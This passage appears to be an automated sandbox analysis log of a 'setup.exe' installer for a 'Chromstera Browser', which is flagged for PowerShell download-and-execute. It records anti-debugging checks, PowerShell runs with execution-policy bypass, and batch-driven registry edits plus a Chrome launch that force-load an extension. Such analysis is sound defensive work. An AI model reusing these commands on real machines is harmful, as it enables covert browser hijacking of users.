                      Source: setup.exe, 00000000.00000003.1717180600.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2318609017.0000000003C48000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1716043563.0000000003C6D000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2315981321.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2315981321.0000000003C34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1716752934.0000000003C34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.1716107883.0000000003C34000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000002.2950811830.0000000003C49000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000000.00000003.2317680666.0000000003C73000.00000004.00000020.00020000.00000000.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810981504.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, ChromsteraUpdater.exe, 00000008.00000002.1810981504.000000000065E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 00000006.00000002.1833673011.000002526E2D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D7F583 IsDebuggerPresent,OutputDebugStringW,0_2_00D7F583
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D00370 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,0_2_00D00370
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CCF120 LoadLibraryW,GetProcAddress,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,FreeLibrary,0_2_00CCF120
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D9A090 mov eax, dword ptr fs:[00000030h]0_2_00D9A090
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D9A04C mov eax, dword ptr fs:[00000030h]0_2_00D9A04C
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D8B54A mov ecx, dword ptr fs:[00000030h]0_2_00D8B54A
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D7F896 mov esi, dword ptr fs:[00000030h]0_2_00D7F896
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D9A090 mov eax, dword ptr fs:[00000030h]3_2_00D9A090
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D9A04C mov eax, dword ptr fs:[00000030h]3_2_00D9A04C
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D8B54A mov ecx, dword ptr fs:[00000030h]3_2_00D8B54A
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D7F896 mov esi, dword ptr fs:[00000030h]3_2_00D7F896
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001501C9 mov esi, dword ptr fs:[00000030h]8_2_001501C9
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0018252D mov eax, dword ptr fs:[00000030h]8_2_0018252D
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00178DA0 mov ecx, dword ptr fs:[00000030h]8_2_00178DA0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D7F902 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,0_2_00D7F902
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BDC5D0 __set_se_translator,SetUnhandledExceptionFilter,0_2_00BDC5D0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D80424 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00D80424
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00D84FE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00D84FE3
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00BDEF30 __set_se_translator,SetUnhandledExceptionFilter,0_2_00BDEF30
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D80424 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00D80424
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BDC5D0 __set_se_translator,SetUnhandledExceptionFilter,3_2_00BDC5D0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00D84FE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00D84FE3
                      Source: C:\Users\user\Desktop\setup.exeCode function: 3_2_00BDEF30 __set_se_translator,SetUnhandledExceptionFilter,3_2_00BDEF30
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00168138 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00168138
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_001682CB SetUnhandledExceptionFilter,8_2_001682CB
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0016C5B3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0016C5B3
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0016784D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0016784D
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C906C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_00007FF77C0C906C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C9924 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF77C0C9924
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0C9B0C SetUnhandledExceptionFilter,16_2_00007FF77C0C9B0C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C0CF478 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_00007FF77C0CF478
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A478906C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,54_2_00007FF7A478906C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4789924 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_00007FF7A4789924
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A4789B0C SetUnhandledExceptionFilter,54_2_00007FF7A4789B0C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: 54_2_00007FF7A478F478 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_00007FF7A478F478

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: setup.exe, type: SAMPLE
                      Source: Yara matchFile source: amsi64_7964.amsi.csv, type: OTHER
                      Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7404, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: setup.exe PID: 7728, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7964, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Windows\Installer\6bc77d.msi, type: DROPPED
                      Source: Yara matchFile source: C:\Windows\Installer\MSICC46.tmp, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi, type: DROPPED
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: 16_2_00007FF77C096D60 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetProcessId,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,SetWindowPos,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongPtrW,16_2_00007FF77C096D60
                      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe" /i "C:\Users\user\AppData\Roaming\Chromstera Solutions\Chromstera Browser 1.0.0.0\install\Chromnius-Main.msi" AI_EUIMSI=1 APPDIR="C:\Program Files (x86)\Chromstera Browser" SECONDSEQUENCE="1" CLIENTPROCESSID="7404" AI_MORE_CMD_LINE=1Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssED0B.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiECF7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrECF8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrECF9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss1394.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi1332.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr1333.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr1334.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Windows\SystemTemp\pssD27E.ps1" -propFile "C:\Windows\SystemTemp\msiD25B.txt" -scriptFile "C:\Windows\SystemTemp\scrD25C.ps1" -scriptArgsFile "C:\Windows\SystemTemp\scrD25D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                      Source: C:\Windows\Installer\MSI4739.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\chrome.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Policies\Google\Chrome\ExtensionInstallAllowlist" /v "1" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "path" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "\Google\Chrome\Extensions\" /v "version" /t REG_SZ /d /f
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default" --no-startup-window --load-extension="C:\apps-helper"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 2
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 5
                      Source: C:\Windows\Installer\MSIFB77.tmpProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\edge.bat" "
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "c:\users\user\desktop\setup.exe" /i "c:\users\user\appdata\roaming\chromstera solutions\chromstera browser 1.0.0.0\install\chromnius-main.msi" ai_euimsi=1 appdir="c:\program files (x86)\chromstera browser" secondsequence="1" clientprocessid="7404" ai_more_cmd_line=1
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\windows\systemtemp\pssd27e.ps1" -propfile "c:\windows\systemtemp\msid25b.txt" -scriptfile "c:\windows\systemtemp\scrd25c.ps1" -scriptargsfile "c:\windows\systemtemp\scrd25d.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pssed0b.ps1" -propfile "c:\users\user\appdata\local\temp\msiecf7.txt" -scriptfile "c:\users\user\appdata\local\temp\screcf8.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\screcf9.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss1394.ps1" -propfile "c:\users\user\appdata\local\temp\msi1332.txt" -scriptfile "c:\users\user\appdata\local\temp\scr1333.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr1334.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."
                      Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\Desktop\setup.exe "c:\users\user\desktop\setup.exe" /i "c:\users\user\appdata\roaming\chromstera solutions\chromstera browser 1.0.0.0\install\chromnius-main.msi" ai_euimsi=1 appdir="c:\program files (x86)\chromstera browser" secondsequence="1" clientprocessid="7404" ai_more_cmd_line=1Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pssed0b.ps1" -propfile "c:\users\user\appdata\local\temp\msiecf7.txt" -scriptfile "c:\users\user\appdata\local\temp\screcf8.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\screcf9.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\users\user\appdata\local\temp\pss1394.ps1" -propfile "c:\users\user\appdata\local\temp\msi1332.txt" -scriptfile "c:\users\user\appdata\local\temp\scr1333.ps1" -scriptargsfile "c:\users\user\appdata\local\temp\scr1334.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -noprofile -noninteractive -executionpolicy bypass -file "c:\windows\systemtemp\pssd27e.ps1" -propfile "c:\windows\systemtemp\msid25b.txt" -scriptfile "c:\windows\systemtemp\scrd25c.ps1" -scriptargsfile "c:\windows\systemtemp\scrd25d.txt" -propsep " :<->: " -linesep " <<:>> " -testprefix "_testvalue."Jump to behavior
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_0013BCD0 LocalFree,GetLastError,GetLastError,LocalAlloc,GetLastError,LocalFree,LocalFree,GetLastError,LocalFree,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,GetLastError,LocalFree,SetSecurityDescriptorDacl,GetLastError,LocalFree,8_2_0013BCD0
                      Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_00CC72E0 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,CloseHandle,0_2_00CC72E0
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: 8_2_00167DEC cpuid 8_2_00167DEC
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00188091
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: GetLocaleInfoW,8_2_00188197
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00188266
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: EnumSystemLocalesW,8_2_0018073A
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: GetLocaleInfoW,8_2_00180CB7
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: GetLocaleInfoEx,8_2_00167283
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: EnumSystemLocalesW,8_2_00187BA4
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: EnumSystemLocalesW,8_2_00187BEF
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: EnumSystemLocalesW,8_2_00187C8A
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00187D15
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: GetLocaleInfoW,GetLocaleInfoW,8_2_000DBE10
                      Source: C:\Program Files (x86)\Chromstera Browser\ChromsteraUpdater.exeCode function: GetLocaleInfoW,8_2_00187F68
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: GetLocaleInfoEx,FormatMessageA,16_2_00007FF77C0A2530
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,16_2_00007FF77C0EB6E0
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: EnumSystemLocalesW,16_2_00007FF77C0E4710
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_00007FF77C0EBF38
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,16_2_00007FF77C0EC114
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: EnumSystemLocalesW,16_2_00007FF77C0EBA2C
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: EnumSystemLocalesW,16_2_00007FF77C0EBAFC
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: GetLocaleInfoEx,16_2_00007FF77C0C83A4
                      Source: C:\Windows\Installer\MSI4739.tmpCode function: GetLocaleInfoW,16_2_00007FF77C0E4C54
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: GetLocaleInfoEx,FormatMessageA,54_2_00007FF7A4762530
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,54_2_00007FF7A47AB6E0
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: EnumSystemLocalesW,54_2_00007FF7A47A4710
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,54_2_00007FF7A47ABF38
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,54_2_00007FF7A47AC114
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: EnumSystemLocalesW,54_2_00007FF7A47ABAFC
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: EnumSystemLocalesW,54_2_00007FF7A47ABA2C
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: GetLocaleInfoEx,54_2_00007FF7A47883A4
                      Source: C:\Windows\Installer\MSIFB77.tmpCode function: GetLocaleInfoW,54_2_00007FF7A47A4C54
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\sys_min_down.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\sys_min_hot.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\sys_min_hot.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\sys_min_normal.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\sys_min_inactive.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_left.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_left_inactive.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_mid.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_mid_inactive.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_caption.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_caption_inactive.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_right.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_top_right_inactive.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_left.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_left_inactive.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_right.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_right_inactive.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_left.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_left_inactive.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_mid.bmp VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\setup.exeQueries volume information: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_7404\frame_bottom_mid_inactive.bmp VolumeInformationJump to behavior
